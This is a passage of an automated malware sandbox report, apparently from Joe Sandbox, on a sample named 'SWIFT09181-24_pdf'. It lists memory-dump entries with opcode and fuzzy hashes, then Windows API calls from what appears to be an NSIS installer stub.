                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ed2199f620e5b76b36a01df794486190f6db0aeda331dc7adbbb77e67d1467e0
                                                                                                                                    • Instruction ID: 85417b688f686bbe98667f5ed5a3bb50c94039cbb024697a95957c0ad66240e1
                                                                                                                                    • Opcode Fuzzy Hash: ed2199f620e5b76b36a01df794486190f6db0aeda331dc7adbbb77e67d1467e0
                                                                                                                                    • Instruction Fuzzy Hash: AA21D131304911CFC7199B65D86852EB7A2BF857967154039E81EDF754CF70DC06CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 809e8b6510fda68ed1777324f050178e731f35f25a8d61fc9173bdac772f40d3
                                                                                                                                    • Instruction ID: 8d6141de2351608541231346f82c46e6a44baaab1de0ff57df0529c7ec3272da
                                                                                                                                    • Opcode Fuzzy Hash: 809e8b6510fda68ed1777324f050178e731f35f25a8d61fc9173bdac772f40d3
                                                                                                                                    • Instruction Fuzzy Hash: 5121DF70D02319DFEB04DFA5D4447EEBBB2BF89304F508829E419BB250DB795A8ACB51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 62e948509361d89e3a63a61d10fa8e5806bfe2edf8571f36876f5652642751de
                                                                                                                                    • Instruction ID: 64be8b4dcdb3fa7a943c05dd7ca02b209262ce6d8b938c84d78c29d4291201fb
                                                                                                                                    • Opcode Fuzzy Hash: 62e948509361d89e3a63a61d10fa8e5806bfe2edf8571f36876f5652642751de
                                                                                                                                    • Instruction Fuzzy Hash: B321B070E04208DFDB05EFF9D4402AEBBB2EFCA305F0084AAD854AB295CB745A49CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cc310ec6013dc891373e613bb15ff6545439067c51e983b3920a433538002695
                                                                                                                                    • Instruction ID: ad175157543dc361f66bcc21085b574f488235736745ef52aa12420dcf75dbce
                                                                                                                                    • Opcode Fuzzy Hash: cc310ec6013dc891373e613bb15ff6545439067c51e983b3920a433538002695
                                                                                                                                    • Instruction Fuzzy Hash: BB31BF78E05208DFCB58DFE8D58489DBBB2FF49705B204069E819AB364DB32AD46CF41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: addef35514defc2150d7715c5dd6fe9d3c54e5f5467d1a7a94ad6fc4c014d89c
                                                                                                                                    • Instruction ID: beae046c4599214faad9769fa243ed0c8f769cdc5aa87e2e4cb900e0333e3e74
                                                                                                                                    • Opcode Fuzzy Hash: addef35514defc2150d7715c5dd6fe9d3c54e5f5467d1a7a94ad6fc4c014d89c
                                                                                                                                    • Instruction Fuzzy Hash: 50211674D053498FCB02DFB9D8446EEBFF0AF0A300F0441AAD445BB261EB305A89CBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e3e0832b705c795cb4328f9ddc062a07129830da8d57c8b9088f4d88e5a1e22d
                                                                                                                                    • Instruction ID: 75ec942aa026f68eb1f89e2ebb532a1ff7b37b999d3571056bf32ba23316de57
                                                                                                                                    • Opcode Fuzzy Hash: e3e0832b705c795cb4328f9ddc062a07129830da8d57c8b9088f4d88e5a1e22d
                                                                                                                                    • Instruction Fuzzy Hash: 2421D231608109DFCF159F64D4557AE3BA1EB86309F204028FC199B259CB74CE95DBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ff7e841cea488fe087b11cc70872a0f124e4c56e9539f67d666f9ef42b10325d
                                                                                                                                    • Instruction ID: faf28d27a664146b7042cf0dec79f791cfe3dfaf1c8e6c9d731a5d5ce503e521
                                                                                                                                    • Opcode Fuzzy Hash: ff7e841cea488fe087b11cc70872a0f124e4c56e9539f67d666f9ef42b10325d
                                                                                                                                    • Instruction Fuzzy Hash: EC217F74E01249DFDB15CFA5D544AEDBFB6AF48302F248069E825F6290DB30D985DF60
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d190064ea757e14c6eb984b9e66bb54220892daa124cc68635a5b324cc2175ad
                                                                                                                                    • Instruction ID: 908d98d06e524a68c3e857152c64f0c714548eedbd1ff3845c3b6905acbccfac
                                                                                                                                    • Opcode Fuzzy Hash: d190064ea757e14c6eb984b9e66bb54220892daa124cc68635a5b324cc2175ad
                                                                                                                                    • Instruction Fuzzy Hash: 0321F8B4E04209DFCB04DFA9C544AADBBF1BF4A301F1184AAD855AB361D7349A48CB51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f77922c9d5dcb339da61e40e7f76e6a63d8363f0bc4317a4e854ab8d4b83e5d5
                                                                                                                                    • Instruction ID: d509db305bee8a01f7f5b318f0ab87904ceef6d5fb216f91fafb9b130215fc24
                                                                                                                                    • Opcode Fuzzy Hash: f77922c9d5dcb339da61e40e7f76e6a63d8363f0bc4317a4e854ab8d4b83e5d5
                                                                                                                                    • Instruction Fuzzy Hash: B7119E35309A11DFC7199B36D8A852E77A2FF857923190078E81ACF760DF60DC468790
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d43cb1b0efd39b1ca4d3fed7e64898992b4e659f85adc90508d0383aa5ac535b
                                                                                                                                    • Instruction ID: 2110addc4b25a465953103fd108dc49f58297bd836f57ca9d1957223ecd38e52
                                                                                                                                    • Opcode Fuzzy Hash: d43cb1b0efd39b1ca4d3fed7e64898992b4e659f85adc90508d0383aa5ac535b
                                                                                                                                    • Instruction Fuzzy Hash: FD010836B082014FDB559F35489862F7BE6BF8971930444BDD90ACB215FF60C8498752
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c93df9b0fce936aa93041616339bfa5c20ba0b1cd85366b09c2e8c9930d5863b
                                                                                                                                    • Instruction ID: bd00cb97d4ac907c03ee2effc363e19b91b5d607875b7bbd869ecf2029119997
                                                                                                                                    • Opcode Fuzzy Hash: c93df9b0fce936aa93041616339bfa5c20ba0b1cd85366b09c2e8c9930d5863b
                                                                                                                                    • Instruction Fuzzy Hash: D5211478D0420ADFEB00DFA5C8557EEBBB1FB89300F108929D815B32A4DB745A4ACF91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: facb6d78aafbae9ba81ea44c657a033f7e33908e555c5fdef9165ce67347c245
                                                                                                                                    • Instruction ID: 4e5608a357cb68e7577b5e7e036f385c329157cefd72c9d8041abb83188024cc
                                                                                                                                    • Opcode Fuzzy Hash: facb6d78aafbae9ba81ea44c657a033f7e33908e555c5fdef9165ce67347c245
                                                                                                                                    • Instruction Fuzzy Hash: 98010036B083018FDB159B75489862E7BE6AF8561531548BDC80ACB221FF60CC0A8792
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922255419.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_9d000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e30d8c23d169001941ea9aa459473fa7ec8b4af4ddb27b59cb516a26a12e2698
                                                                                                                                    • Instruction ID: d1a741e872e1ce4607b89ff8e39c07f22014ec1ebdd2348537134ad35ca9c363
                                                                                                                                    • Opcode Fuzzy Hash: e30d8c23d169001941ea9aa459473fa7ec8b4af4ddb27b59cb516a26a12e2698
                                                                                                                                    • Instruction Fuzzy Hash: E011D376544644DFCF06CF10D5C4B16BFB2FB94318F24C6AAD8490B616C33AD85ADBA2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 130b5db321f23ae36fe9a641e6890667115647f098e2cebfd37ab0f74b25ef15
                                                                                                                                    • Instruction ID: 84d6580f9c9b9a46ccebc0f0a983f94f9aa7a9f0f416e27ec59634c5c6227b9a
                                                                                                                                    • Opcode Fuzzy Hash: 130b5db321f23ae36fe9a641e6890667115647f098e2cebfd37ab0f74b25ef15
                                                                                                                                    • Instruction Fuzzy Hash: 78211478D0420ADFEB00DFA5C8557EEBBB1FB89300F108929D815B32A4DB745A4ACF91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f39a6bfca563e877d05bbfffad7af47a2162f6129e13997e4aea51325d70dffe
                                                                                                                                    • Instruction ID: b587b941de301d41ee19567879a6de0501a4792a4c1f200ba58f30799095da5b
                                                                                                                                    • Opcode Fuzzy Hash: f39a6bfca563e877d05bbfffad7af47a2162f6129e13997e4aea51325d70dffe
                                                                                                                                    • Instruction Fuzzy Hash: CB016832708144AFCB028E649C21AEF3FB6DFC9340B28802AF914CB281CB758D469B90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3985b474287706d1c232e86c31354527048bc8d1983c05158f1fd6a8fc60f77a
                                                                                                                                    • Instruction ID: dd25587d42db07927f961f65135bcacd259d8e4b973cb97eb7fa540223b86ad3
                                                                                                                                    • Opcode Fuzzy Hash: 3985b474287706d1c232e86c31354527048bc8d1983c05158f1fd6a8fc60f77a
                                                                                                                                    • Instruction Fuzzy Hash: 4901D6367043119FD714AB79884862F76EBBFC86253148879D80DDB224FF70CC454791
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a709b804292fa882247aa8706943f695a79994d776d38d350d727d1fb7247603
                                                                                                                                    • Instruction ID: 79febd4d77916cc5b9622c2a1b5b1a5adf8c1db1cf49ed9780392847a3eaf005
                                                                                                                                    • Opcode Fuzzy Hash: a709b804292fa882247aa8706943f695a79994d776d38d350d727d1fb7247603
                                                                                                                                    • Instruction Fuzzy Hash: 0301AD30904208CFEB048FF0D8086E8BBB1EB8A302F005038E9147A260CB76594ACB60
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 667992310b64a75c3281aaebd24d7b5c0f8c6bdac8fdd21348a2833131b4a5bf
                                                                                                                                    • Instruction ID: ef826f91e92d198b37dd33ee434b38f450d90ea4336e47f475de6768620fc78f
                                                                                                                                    • Opcode Fuzzy Hash: 667992310b64a75c3281aaebd24d7b5c0f8c6bdac8fdd21348a2833131b4a5bf
                                                                                                                                    • Instruction Fuzzy Hash: ADF0F834419F428FE3012B30ACBC2AA7FB0FF0B3137856D95E04AC6072DB694449CB11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0cdcea2dbe8f4ac0f18b284d25e0f16d67f5039765c4ceb73055026b4dae6f0d
                                                                                                                                    • Instruction ID: b04a65babfd594368a8cea096e5619cc4c661b0681b2a701c8e1f9b77f9ae986
                                                                                                                                    • Opcode Fuzzy Hash: 0cdcea2dbe8f4ac0f18b284d25e0f16d67f5039765c4ceb73055026b4dae6f0d
                                                                                                                                    • Instruction Fuzzy Hash: FDF08C30A0A204DFD745DFB8D50929CBFB1EF4A301F2485AAD854E7661D7714A49DB00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 648fbe537fe6e00e006e7f42e38ee00e7a0ccbaf977025f185e5823745da0fba
                                                                                                                                    • Instruction ID: 09e5e2d4c09a92727f76db8d61ec90587f90ebc3427cca921c5764fce9c96c23
                                                                                                                                    • Opcode Fuzzy Hash: 648fbe537fe6e00e006e7f42e38ee00e7a0ccbaf977025f185e5823745da0fba
                                                                                                                                    • Instruction Fuzzy Hash: 40E0D831D153964EC7039FB098044EDBF30ED93610B4542E7D094BB052EB30194DC772
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0f97e797188660c65917793be1b6c0a104405637f354ca0ebb0bfc0fd5fc05f4
                                                                                                                                    • Instruction ID: feabff3cfd944a41d3b44709182a2d6e7ac677f1d933ec6820aa19325607578f
                                                                                                                                    • Opcode Fuzzy Hash: 0f97e797188660c65917793be1b6c0a104405637f354ca0ebb0bfc0fd5fc05f4
                                                                                                                                    • Instruction Fuzzy Hash: 60E09A34D04208DFDB04DFB8E40969CBBF5EB49301F2080BAE818A3360EB709E46DB40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a461b8cf24b2ce732317a2bf5c099a4aa32f8ed7f9154fb0d3e77d9af8c01010
                                                                                                                                    • Instruction ID: 3fc37cdf41a9c71f7d7742c52c3704af94edc7e368bbdf8597f747ab6007adc7
                                                                                                                                    • Opcode Fuzzy Hash: a461b8cf24b2ce732317a2bf5c099a4aa32f8ed7f9154fb0d3e77d9af8c01010
                                                                                                                                    • Instruction Fuzzy Hash: 6BD02735549341DFC7038B309420C55FF23DFC7101F0146DED84847560C310881E4343
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c37edafb4d66f51732a10af9ef24833c264810173fe93ef543f6f91c657fe3a8
                                                                                                                                    • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                    • Opcode Fuzzy Hash: c37edafb4d66f51732a10af9ef24833c264810173fe93ef543f6f91c657fe3a8
                                                                                                                                    • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9da5135879a716e2983fb0fa328f252c69bb26381283d1f7df5d4a048bb90f4c
                                                                                                                                    • Instruction ID: 299b84c0034ce81ab8b45489c68337aceab995ee28db3568067a8e3414cfd2a4
                                                                                                                                    • Opcode Fuzzy Hash: 9da5135879a716e2983fb0fa328f252c69bb26381283d1f7df5d4a048bb90f4c
                                                                                                                                    • Instruction Fuzzy Hash: 28E0C23504C3884FCB23E770ACA45C9BF36AB81204F004679D40A0B6BFDFB4168ADB21
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                    • Instruction ID: 9968b1f7b0fc0b7bf7e049fa17098cae9ca96013ffba795bad1e7fd54a298b3b
                                                                                                                                    • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                    • Instruction Fuzzy Hash: F4C0123310C1286A9224504E7C469A3A74CC2C13B5A210177F93D8724054425C4411B4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 17ddd4f347c6c81519aa02bc3a5bb511777ff3a9c4afbe2735d1f8cae3414509
                                                                                                                                    • Instruction ID: 209fff4c6dd79abf6d747461b67e00fd1c3b2e1a220afe2d051abea7abffb973
                                                                                                                                    • Opcode Fuzzy Hash: 17ddd4f347c6c81519aa02bc3a5bb511777ff3a9c4afbe2735d1f8cae3414509
                                                                                                                                    • Instruction Fuzzy Hash: 89D02E3090A285CFD382DFF499066E9BF30AB07302F0481CEE808A3A60C7340E18D312
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d5bc33a57009f56c43bc38a30599f785aaddb2193e07428d5858143e50126f35
                                                                                                                                    • Instruction ID: b33808f1c184a331f20a667c8890a935d90cd17d50f1231bd2586958cb30cbe1
                                                                                                                                    • Opcode Fuzzy Hash: d5bc33a57009f56c43bc38a30599f785aaddb2193e07428d5858143e50126f35
                                                                                                                                    • Instruction Fuzzy Hash: 43D0673AB40018DFCB149F99EC809DDF7B6FB98221B148116E915A3261C7319965DB64
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 90ec4c3bfa0240a88d4aa7a6fa8bb8a7ed3dabeb1db778e077a7e854c49f27c2
                                                                                                                                    • Instruction ID: 8c810169ca1ffb11eda698e882c2229f92b67734321277a0d42a9852433f172c
                                                                                                                                    • Opcode Fuzzy Hash: 90ec4c3bfa0240a88d4aa7a6fa8bb8a7ed3dabeb1db778e077a7e854c49f27c2
                                                                                                                                    • Instruction Fuzzy Hash: BDD0A930801208DBC340DBA4E80ABA9BB78A703302F0010A8A808232208BB10E04C694
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 16ebe0eb42fd33ecf86f166394e2c8ba042f1afdb58b9610731932b8b693fc59
                                                                                                                                    • Instruction ID: aa332d600f8e045fefaf9f490628bbfbf440a1b9545ba1286b9ecbafbc733235
                                                                                                                                    • Opcode Fuzzy Hash: 16ebe0eb42fd33ecf86f166394e2c8ba042f1afdb58b9610731932b8b693fc59
                                                                                                                                    • Instruction Fuzzy Hash: E1C08C74001E0A8BE2042F90BC0CB79B7B8F707313FC82E10F00C028708BB84414CA49
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d3b6ca7760bb442d044cc92154d5db89cb1cc1c3227f617bc088cfc4c43caa5b
                                                                                                                                    • Instruction ID: b8aae9b73c2975ac37e29d3739e35eea931936cd655f145499e36beb3019acaa
                                                                                                                                    • Opcode Fuzzy Hash: d3b6ca7760bb442d044cc92154d5db89cb1cc1c3227f617bc088cfc4c43caa5b
                                                                                                                                    • Instruction Fuzzy Hash: 5CC012300583084FD542F7A5DD45555B72EA7802007408530A0090767EDFF469CA9A90
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                                                    • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                    • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                    • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                                    • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                                                    • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
